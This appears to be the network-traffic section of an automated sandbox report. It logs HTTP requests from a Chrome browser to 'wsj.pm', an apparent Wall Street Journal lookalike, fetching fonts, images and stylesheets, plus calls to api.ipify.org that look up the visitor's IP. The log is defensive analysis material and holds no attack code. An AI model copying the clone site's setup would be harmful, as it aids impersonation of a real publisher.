                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.14
                                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.14
                                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.14
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wsj.pmConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /css/footer.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
